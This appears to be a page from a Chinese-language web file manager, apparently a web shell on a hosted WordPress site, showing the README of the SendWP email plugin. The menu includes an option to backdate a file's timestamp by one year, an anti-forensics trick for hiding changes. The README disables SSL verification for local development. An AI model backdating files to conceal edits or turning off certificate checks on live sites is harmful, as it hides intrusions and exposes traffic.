文件操作 - README.md
返回文件管理
返回主菜单
删除本文件
文件: /storage/v12552/kidsonlychiropract/public_html/wp-content/plugins/sendwp/README.md
编辑文件内容
# SendWP The easy solution to transactional email in WordPress. ## Local Development The SendWP Server URL can be overriden in `wp-config.php` by adding the following: ```php define('SENDWP_SERVER_URL', 'https://wordpress.local'); ``` When developing with a local instance of the SendWP server, be sure to filter `https_ssl_verify`. ```php add_filter( 'https_local_ssl_verify', '__return_false' ); add_filter( 'https_ssl_verify', '__return_false' ); ```
修改文件时间
将文件时间修改为当前时间的前一年
删除文件